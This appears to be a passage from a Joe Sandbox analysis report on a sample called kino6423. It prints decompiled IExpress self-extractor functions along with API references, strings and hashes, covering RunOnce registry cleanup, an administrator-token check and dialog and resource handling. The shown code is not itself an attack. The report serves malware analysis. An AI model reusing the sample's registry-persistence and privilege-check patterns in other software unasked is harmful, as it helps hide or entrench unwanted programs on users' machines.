								if(RegQueryValueExA(_v284, 0xe51140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00E51680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00E56CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00e52773
0x00e5277e
0x00e52785
0x00e5278a
0x00e5278d
0x00e52790
0x00e52792
0x00e52798
0x00e5279d
0x00e528b2
0x00000000
0x00e527a3
0x00e527a3
0x00e527af
0x00e527c2
0x00e527c8
0x00e527cd
0x00e527d5
0x00e528b7
0x00e528b9
0x00000000
0x00e527db
0x00e527dd
0x00e528aa
0x00000000
0x00e527e3
0x00e527e3
0x00e527ec
0x00e527f8
0x00e52803
0x00e5280b
0x00e52831
0x00e528c3
0x00e528c9
0x00e528cd
0x00e52837
0x00e5285a
0x00e5285c
0x00e52865
0x00e52892
0x00e52895
0x00000000
0x00000000
0x00e52867
0x00e52878
0x00e5288c
0x00000000
0x00e5287a
0x00e52880
0x00e52885
0x00e52897
0x00e52899
0x00e52899
0x00e52878
0x00e52865
0x00e528a0
0x00e528bf
0x00e528c1
0x00000000
0x00000000
0x00e528c1
0x00e52831
0x00e527dd
0x00e527d5
0x00e528e5

APIs

CharUpperA.USER32(5BA1A886,00000000,00000000,00000000), ref: 00E527A8
CharNextA.USER32(0000054D), ref: 00E527B5
CharNextA.USER32(00000000), ref: 00E527BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E52829
RegQueryValueExA.ADVAPI32(?,00E51140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E52852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E52870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E528A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00E528AA
GetSystemDirectoryA.KERNEL32 ref: 00E528B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00E527E4

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: e538d361196935661a09a6e3de2bb1a61e854b85b377ab9a37e234b1520b1318
Instruction ID: 7469148fd72e67941b2c4ecd2dbbfd255bfa43a66528c3824d64c1d0bc383c0f
Opcode Fuzzy Hash: e538d361196935661a09a6e3de2bb1a61e854b85b377ab9a37e234b1520b1318
Instruction Fuzzy Hash: C241B87190021CAFDB289B65DC45AFA7BBDEF16702F0448E9FA45F2150DB704E898F91

Uniqueness

Uniqueness Score: -1.00%

Function 00E52267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00E52267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xe58004; // 0x5ba1a886
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xe58530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00E5658A( &_v268, 0x104, 0xe51140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E00E5171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00E56CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00e52272
0x00e52277
0x00e52279
0x00e52283
0x00e52289
0x00e522ab
0x00e522b1
0x00e522c4
0x00e522e0
0x00e522e6
0x00e522f5
0x00e5230d
0x00e5231c
0x00e5231c
0x00e52321
0x00e5233a
0x00e52342
0x00e52348
0x00e5234b
0x00e5234c
0x00e5234c
0x00e5234e
0x00e5234f
0x00e5236e
0x00e5236e
0x00e5237a
0x00e52380
0x00e52380
0x00e52381
0x00e52381
0x00e5238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00E522A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00E522D8
memset.MSVCRT ref: 00E522F5
GetSystemDirectoryA.KERNEL32 ref: 00E52305
RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00E5236E
RegCloseKey.ADVAPI32(?), ref: 00E5237A

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00E5232D
wextract_cleanup2, xrefs: 00E5227C, 00E522CD, 00E52363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E52299
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E52321

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
API String ID: 3027380567-2274915764
Opcode ID: a3b8a012ea7650653807c0f8a25a37b9f2c32a480dadc49a3decc9c76ba675af
Instruction ID: 4fb02275143e31ee773d6ae70f5b3382442d2c1be516a26e99853b1f2db0bfe9
Opcode Fuzzy Hash: a3b8a012ea7650653807c0f8a25a37b9f2c32a480dadc49a3decc9c76ba675af
Instruction Fuzzy Hash: A931D471A00318ABDB259B21DC49FEB7B7CEB15702F0409E9B94DB6050EA70AF8CCA50

Uniqueness

Uniqueness Score: -1.00%

Function 00E53100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E53100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xe58590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xe58590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00E543D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xe58d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xe588b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00E530C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00e53108
0x00e5310b
0x00e531b7
0x00e531ca
0x00e531d0
0x00e531d0
0x00e531da
0x00000000
0x00e531da
0x00e53111
0x00e53114
0x00e53136
0x00e53136
0x00e53138
0x00e5313b
0x00e53141
0x00000000
0x00e53143
0x00e53116
0x00e5311b
0x00e5314b
0x00e53151
0x00e53158
0x00e5316a
0x00e53176
0x00e5317d
0x00e5318b
0x00e5319e
0x00e531a3
0x00000000
0x00e531ad
0x00e53120
0x00000000
0x00000000
0x00e5312a
0x00e53134
0x00000000
0x00000000
0x00000000
0x00e53134
0x00e5312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00E5313B
GetDesktopWindow.USER32 ref: 00E5314B
SetDlgItemTextA.USER32(?,00000834), ref: 00E5316A
SetWindowTextA.USER32(?,doza2), ref: 00E53176
SetForegroundWindow.USER32(?), ref: 00E5317D
GetDlgItem.USER32(?,00000834), ref: 00E53185
GetWindowLongA.USER32(00000000,000000FC), ref: 00E53190
SetWindowLongA.USER32(00000000,000000FC,00E530C0), ref: 00E531A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00E531CA

Strings

doza2, xrefs: 00E53170

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: c4140fa296c866e524e6db3d89f6f5b713cbef132428fad9461419e7b035d72e
Instruction ID: e70d0db37e8b60a52e691ff44d2839664b0c344375aeafc927e870bf3f71c1ea
Opcode Fuzzy Hash: c4140fa296c866e524e6db3d89f6f5b713cbef132428fad9461419e7b035d72e
Instruction Fuzzy Hash: 1011CD31206B11BFDB155B359E0DB9A3AA4EB4A7A7F041E20FD11B11E0DBB0864DCB42

Uniqueness

Uniqueness Score: -1.00%

Function 00E518A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E518A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xe58004; // 0x5ba1a886
				_v8 = _t23 ^ _t53;
				_t25 =  *0xe58128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00E56CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00E517EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xe58128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xe58128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00e518a3
0x00e518a3
0x00e518ab
0x00e518b2
0x00e518b5
0x00e518be
0x00e518c0
0x00e518c6
0x00e518c7
0x00e518ca
0x00e518cf
0x00e519c9
0x00e519d8
0x00e519d8
0x00e518df
0x00e519b8
0x00e519bd
0x00e519bf
0x00e519bf
0x00000000
0x00e519bd
0x00e518fa
0x00000000
0x00000000
0x00e51912
0x00e519aa
0x00e519ad
0x00e519b3
0x00000000
0x00e51927
0x00e51927
0x00e51932
0x00e51936
0x00e519a9
0x00e519a9
0x00000000
0x00e519a9
0x00e5194c
0x00e519a2
0x00e519a3
0x00000000
0x00e5196e
0x00e51970
0x00e51999
0x00e5199c
0x00000000
0x00e5199c
0x00e51972
0x00e51972
0x00e51975
0x00e51984
0x00e51985
0x00e5198a
0x00000000
0x00000000
0x00000000
0x00e5198c
0x00e51991
0x00e51996
0x00000000
0x00e51996
0x00e5194c

APIs

Part of subcall function 00E517EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E518DD), ref: 00E5181A
Part of subcall function 00E517EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E5182C
Part of subcall function 00E517EE: AllocateAndInitializeSid.ADVAPI32(00E518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E518DD), ref: 00E51855
Part of subcall function 00E517EE: FreeSid.ADVAPI32(?,?,?,?,00E518DD), ref: 00E51883
Part of subcall function 00E517EE: FreeLibrary.KERNEL32(00000000,?,?,?,00E518DD), ref: 00E5188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00E518EB
OpenProcessToken.ADVAPI32(00000000), ref: 00E518F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00E5190A
GetLastError.KERNEL32 ref: 00E51918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00E5192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00E51944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E51964
EqualSid.ADVAPI32(00000004,?), ref: 00E5197A
FreeSid.ADVAPI32(?), ref: 00E5199C
LocalFree.KERNEL32(00000000), ref: 00E519A3
CloseHandle.KERNEL32(?), ref: 00E519AD

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 923df2d2728719454fbca5b21784863a0df86c28b666260ed2aca23acdbf92f4
Instruction ID: 3103474cef5e09e5d25c0ad07de749b8fb95e971bd7fed76ad83dafe785f14b0
Opcode Fuzzy Hash: 923df2d2728719454fbca5b21784863a0df86c28b666260ed2aca23acdbf92f4
Instruction Fuzzy Hash: 11314F71A0020AAFDB149FA6DD48AAFBBBCFF48306F141D65EA45F2150DB30994DCB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E5468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E5468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00e54699
0x00e5469b
0x00e546a9
0x00e546af
0x00e546b4
0x00e546bc
0x00e546f9
0x00000000
0x00e546f9
0x00e546d9
0x00e546dd
0x00000000
0x00000000
0x00e546e5
0x00e546ef
0x00000000
0x00e546f5
0x00e546ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
memcpy_s.MSVCRT ref: 00E546E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

Strings

TITLE, xrefs: 00E5469D, 00E546C0
doza2, xrefs: 00E546E4

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: 08ff68c30126b49e1a0738a1be1707fac7171f50934659f69122435daeba8ac7
Instruction ID: 5744727f03df5ea786951674a69b2e99da1a12430d91c52ba86b08d53093c29f
Opcode Fuzzy Hash: 08ff68c30126b49e1a0738a1be1707fac7171f50934659f69122435daeba8ac7
Instruction Fuzzy Hash: 190186772443107FE31417A69C4DF6B7E2CDBC6B57F080924FE49B61D0D9B1888986A6

Uniqueness

Uniqueness Score: -1.00%

Function 00E5681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E5681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xe58004; // 0x5ba1a886
				_v8 = _t19 ^ _t44;
				_t41 =  *0xe581d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xe581d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xe581d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xe51140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00E566F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xe581d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0xe5463b
				return E00E56CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x00e5681f
0x00e5682a
0x00e56831
0x00e56836
0x00e5683c
0x00e5683e
0x00e56848
0x00e56851
0x00e5685d
0x00e56864
0x00e56876
0x00e5693a
0x00e5693a
0x00e5687c
0x00e5687e
0x00e56885
0x00000000
0x00e568d6
0x00e568f4
0x00e56900
0x00e56902
0x00e5690a
0x00000000
0x00e5690c
0x00e5690c
0x00e5691c
0x00000000
0x00e5691e
0x00e56924
0x00e5692b
0x00e56932
0x00000000
0x00000000
0x00000000
0x00e5692b
0x00e5691c
0x00e5690a
0x00e56885
0x00e56876
0x00e56940
0x00e56951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E5686E
GetSystemMetrics.USER32(0000004A), ref: 00E568A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E568CC
RegQueryValueExA.ADVAPI32(?,00E51140,00000000,?,?,0000000C), ref: 00E568F4
RegCloseKey.ADVAPI32(?), ref: 00E56902

Part of subcall function 00E566F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00E5691A), ref: 00E56741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00E568C2
;F, xrefs: 00E56940

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-574545411
Opcode ID: c426219e9fc5002672b1c0a2e0f333bc5511533a4e3a5f2f398912510c0be067
Instruction ID: d408aef4a1319a1d11d5f756fed78d1533b99211698240f3acce2b7663a3b88e
Opcode Fuzzy Hash: c426219e9fc5002672b1c0a2e0f333bc5511533a4e3a5f2f398912510c0be067
Instruction Fuzzy Hash: CF318E31B013189FDB218B16CD05BAAB7B9FB8572AF4409A5ED49B3150DB309E8D8F52

Uniqueness

Uniqueness Score: -1.00%

Function 00E517EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00E517EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xe58004; // 0x5ba1a886
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xe5a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00E56CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00e517f6
0x00e517fd
0x00e51805
0x00e5180b
0x00e5180d
0x00e51815
0x00e51818
0x00e51820
0x00e51824
0x00e5182c
0x00e51832
0x00e51837
0x00e51851
0x00e51854
0x00e5185d
0x00e51862
0x00e5186c
0x00e51872
0x00e51877
0x00e5187e
0x00e5187e
0x00e51883
0x00e51883
0x00e5185d
0x00e5188a
0x00e5188a
0x00e518a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E518DD), ref: 00E5181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E5182C
AllocateAndInitializeSid.ADVAPI32(00E518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E518DD), ref: 00E51855
FreeSid.ADVAPI32(?,?,?,?,00E518DD), ref: 00E51883
FreeLibrary.KERNEL32(00000000,?,?,?,00E518DD), ref: 00E5188A

Strings

CheckTokenMembership, xrefs: 00E51826
advapi32.dll, xrefs: 00E51810

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 5b1c1721c6dec616ea4774fa7fac38d839b95be31fd32d6bb20feb8dd6d52a51
Instruction ID: 4f4ba820928fe8a5dc23aec65dc737f478eabc7877f9711157b0c1502c607995
Opcode Fuzzy Hash: 5b1c1721c6dec616ea4774fa7fac38d839b95be31fd32d6bb20feb8dd6d52a51
Instruction Fuzzy Hash: 6C119631E00309AFDB189FA5DC49BBEBB78EF44712F140969F911F3290DA709D088B91

Uniqueness

Uniqueness Score: -1.00%

Function 00E53450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E53450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00E543D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0xe59404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
